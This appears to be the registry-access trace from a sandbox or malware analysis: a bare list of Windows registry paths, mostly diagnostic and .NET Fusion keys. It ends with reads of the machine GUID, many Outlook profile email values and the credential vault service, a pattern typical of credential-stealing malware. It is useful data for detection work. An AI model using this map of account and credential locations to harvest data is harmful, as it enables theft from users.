HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344}\NameResource
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\WDI\Config
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\Config\ServerName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR\CLResolutionInterval
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR\DisplayInterval
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR\SkipWatson
HKEY_LOCAL_MACHINE\Software\Microsoft\RADAR\HeapLeakDetection\Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RADAR\HeapLeakDetection\Settings\ReflectionInterval

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\NIUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\ILUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index28
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\00471e98b7a362469ed97e3915fd4111\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\10b0e4d6eb1de34dabd532a0806a0fec\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\192e64c97bf3a54488a039619c763627\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\32a3dc9c400a4b448b60ab7fe553a392\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\43e0bb79f0f2d84db98ff4f730d23d24\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\6a50d9bd87f9a8478751861a1591a6c2\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7760e21103136b47946c9c80fa097f15\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7d19c9e894f20d4780a31c9a9f17da11\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\818ecc2f310b344f807e8af5dc013189\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\Email
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\Parameters\RpcCacheTimeout
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\WOW64
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
